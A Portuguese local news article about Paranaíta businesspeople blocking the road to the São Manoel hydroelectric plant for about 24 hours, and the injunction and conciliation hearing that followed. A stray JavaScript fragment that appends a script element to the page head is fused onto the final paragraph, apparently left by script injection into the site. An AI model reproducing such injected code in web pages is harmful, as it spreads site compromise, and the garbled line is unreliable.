Capa / Em Destaque / Em protesto, empresários de Paranaíta bloqueiam estrada de acesso à Usina São Manoel por 24 horas

Em protesto, empresários de Paranaíta bloqueiam estrada de acesso à Usina São Manoel por 24 horas

bloqueio ptaDa Redação

Um grupo de empresários de Paranaíta resolveu, na sexta-feira, 24 pela manhã, bloquear o acesso à Usina Hidrelétrica São Manoel, em protesto ao descumprimento de um compromisso que havia sido firmado no sentido de concentrar os pagamentos de funcionários do empreendimento no município de Paranaíta. Em reunião na Câmara de Vereadores, os empresários decidiram começar o movimento na sexta-feira mesmo e por volta das 13 horas a entrada já estava bloqueada.

No entanto, o movimento durou pouco mais 24 horas, já que no sábado a tarde o empreendimento conseguiu uma liminar liberando a estrada. No entanto, foi marcado para o dia 27 de julho uma audiência de conciliação entre usina e manifestantes.

Na sexta-feira, os empresários reclamaram bastante da falta de representantes da Empresa São Manoel na reunião que havia sido agendada paras discutir soluções. “Foi um descaso sequer em enviar um representante”, esbravejou o empresário Afonso Bezerra, que liderou a reunião. “Nós precisamos desta indignação”, afiançou a empresaria Laurinda de Oliveira, que defendia um movimento pacífico.

Da reunião de sexta-feira, participaram além dos empresários, integrantes da Administração Municipal. O prefeito Tony Rufatto explicou aos empresários que, como chefe do Executivo local, tem feito diversas reuniões com o empreendimento, que não poderia encabeçar o movimento, no entanto, empenhou sua palavra achando justa a reivindicação. “Nós não podemos retomar frente, mas não posso deixar de apoiar, afinal as reivindicações são justíssimas”, afirmou o prefeito.

A audiência de conciliação acontecerá no dia 27 de julho e foi determinada pelo juiz Antônio Fábio da Silva Marquezini.

Um funcionário da UH São Manoel, chefe de patrimônio, confirmou uma reunião entre funcionários e o diretor Antônio Brasiliano, par ao dia 7 de julho nas dependências da Câmara Municipal.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top